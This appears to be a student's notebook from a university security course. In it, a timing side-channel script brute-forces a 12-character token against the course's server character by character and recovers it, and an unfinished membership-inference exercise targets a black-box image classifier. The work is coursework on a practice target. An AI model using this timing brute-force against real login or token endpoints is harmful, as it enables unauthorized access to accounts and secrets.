# Ex3

Actual code:

In [8]:
import string
import json
import requests
import numpy as np

url = 'http://com402.epfl.ch/hw5/ex3'
headers = {'Content-Type': 'application/json'}

# Generate set of some characters
chars = string.digits + string.ascii_lowercase
groups=1

length = 12
iterations = 10

In [9]:
## Find first two characters
pwd_found = ''
res = []
for i in range(len(pwd_found), 2, groups):
    pwd_suffix = '.' * (11 - i)
    times = []
    
    for c in chars:
        times_c = []
        pwd = pwd_found + c + pwd_suffix
        for i in range(iterations):
            assert len(pwd) == 12, str(pwd)
            payload = {'email': 'lucia.monterosanchis@epfl.ch', 'token': pwd}
            response = requests.post(url, data=json.dumps(payload), headers=headers)
            times_c.append(response.elapsed.total_seconds())
        times.append(times_c)
        print(c,' ', response)

    res.append(times)
    
    # select the one with largest time
    times_np = np.array(times).sum(axis=1)
    pwd_found = pwd_found + chars[times_np.argmax()]
    print(pwd_found)

0   <Response [500]>
1   <Response [500]>
2   <Response [500]>
3   <Response [500]>
4   <Response [500]>
5   <Response [500]>
6   <Response [500]>
7   <Response [500]>
8   <Response [500]>
9   <Response [500]>
a   <Response [500]>
b   <Response [500]>
c   <Response [500]>
d   <Response [500]>
d
0   <Response [500]>
1   <Response [500]>
2   <Response [500]>
3   <Response [500]>
4   <Response [500]>
5   <Response [500]>
6   <Response [500]>
7   <Response [500]>
8   <Response [500]>
9   <Response [500]>
a   <Response [500]>
b   <Response [500]>
c   <Response [500]>
d   <Response [500]>
d3


In [47]:
pwd_found='d3' # I found it from the previous code, but it sometimes gets sth different...

payload = {'email': 'lucia.monterosanchis@epfl.ch', 'token': pwd_found+'.'*(12-len(pwd_found))}
# Do it twice bc it sometimes does weird things...
response = requests.post(url, data=json.dumps(payload), headers=headers)
response = requests.post(url, data=json.dumps(payload), headers=headers)
time = response.elapsed.total_seconds()
time

4.590165

In [48]:
## Look for rest of characters
for j in range(len(pwd_found), length, groups):
    print("Looking for char nb.", j)
    pwd_suffix = '.' * (11 - j)
    found = False
    
    for i in range(iterations):
        for c in chars:
            times_c = []
            pwd = pwd_found + c + pwd_suffix
            assert len(pwd) == 12, str(pwd)
            payload = {'email': 'lucia.monterosanchis@epfl.ch', 'token': pwd}
            response = requests.post(url, data=json.dumps(payload), headers=headers)
            delay = response.elapsed.total_seconds()
            print(pwd, response, delay)
            
            if delay >= time + .45:
                print("break 1")
                time = delay
                pwd_found = pwd_found + c
                print(pwd_found)
                found = True
                break

        if found:
            print("break 2")
            break

Looking for char nb. 6
d3bf4a0..... <Response [500]> 4.530052
d3bf4a1..... <Response [500]> 4.590623
d3bf4a2..... <Response [500]> 5.322067
break 1
d3bf4a2
break 2
Looking for char nb. 7
d3bf4a20.... <Response [500]> 5.319972
d3bf4a21.... <Response [500]> 5.316648
d3bf4a22.... <Response [500]> 5.324252
d3bf4a23.... <Response [500]> 5.320518
d3bf4a24.... <Response [500]> 5.321962
d3bf4a25.... <Response [500]> 6.057325
break 1
d3bf4a25
break 2
Looking for char nb. 8
d3bf4a250... <Response [500]> 6.047669
d3bf4a251... <Response [500]> 6.053697
d3bf4a252... <Response [500]> 6.047237
d3bf4a253... <Response [500]> 6.055074
d3bf4a254... <Response [500]> 6.020897
d3bf4a255... <Response [500]> 6.083057
d3bf4a256... <Response [500]> 6.053617
d3bf4a257... <Response [500]> 6.052491
d3bf4a258... <Response [500]> 6.057054
d3bf4a259... <Response [500]> 6.04875
d3bf4a25a... <Response [500]> 6.026275
d3bf4a25b... <Response [500]> 6.772261
break 1
d3bf4a25b
break 2
Looking for char nb. 9
d3bf4a25b0.. <R

In [49]:
#pwd_found = 'd3bf4a2kTZgs'
pwd_found = 'd3bf4a25b817'

In [50]:
# Get token
payload = {'email': 'lucia.monterosanchis@epfl.ch', 'token': pwd_found}
response = requests.post(url, data=json.dumps(payload), headers=headers)
print(response.text)

LXWO83EV/SROOkxJb6JuGWaZIMm5uKdErsBF4DSkmyc=


# Ex4

You can upload your **dataset** and **data classification task** to the service and pay it to construct a model, then ObjectiveToday makes available the trained model through an API (*black-box model*). There's a way to infer whether a given patient was part
of the training set of the model, *by only querying this black-box model*.


To begin with, take a look at a very recent, well-written paper [1,2] that describes this attack in the wild. You’ll perform a similar (simpler) attack.

For this assignment, we have trained an ML model using images from the **CIFAR-100**
dataset (images belonging to 100 classes). Please
use the dataset for Python. Read the
data with `load_cifar100_data()` in `utils_handouts.py`

Our ML model (**the target model**), is available for you to query in a
docker image, in a black-box fashion: given an image, the model answers with the
probabilities of the image being in each of the 100 classes.

To query the target model:
* `sudo systemctl start docker`
* Download the docker image `sudo docker pull dedis/com402_hw5_ex4`
* Start the docker image `sudo docker run --rm -it -name hw5ex4 dedis/com402_hw5_ex4`
* Copy your own test image batch in docker, which contains 100 test images (more details about downloading the image batch follow in the subsection *Goal*). This command needs to be executed in the host

`docker cp images_JohnDoe.npy hw5ex4:/target/images_JohnDoe.npy`

* Finally, query the target model with one of the images in the batch file. You’ll pass to the command the path and name of the batch file, as well as the index of the image you want to query, from 0 to 99 inclusive. This command needs to be executed in the docker container.

`python3 run_target.py images_JohnDoe.npy 1`

* Disconnect from Docker: `sudo systemctl stop docker`

**You need at least 70 correct predictions, using keras. You have to upload a json of the format:**
`{"email":"lucia.monterosanchis@epfl.ch","predictions":"[bit1,bit2...]"}`

as a POST request to `http://com402.epfl.ch/hw5/ex4_predictions`

In [ ]:
from utils_handouts import load_batch_images, load_batch_labels

In [ ]:
# load images and labels
# labels are only necessary to train the attacker models,
# not for querying the docker target model
images = load_batch_images("images_lucia.monterosanchis@epfl.ch.npy")
labels = load_batch_labels("labels_lucia.monterosanchis@epfl.ch.npy")

In [ ]:
import tensorflow, keras
print(tensorflow.__version__)
print(keras.__version__)

In [ ]:
nb_shadow_models = 10
nb_samples = 5000
batch_size=100

### Submit

In [ ]:
!curl -X POST -H "Content-Type: application/json" -d '{"email":"lucia.monterosanchis@epfl.ch","predictions":"[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]"}' http://com402.epfl.ch/hw5/ex4_predictions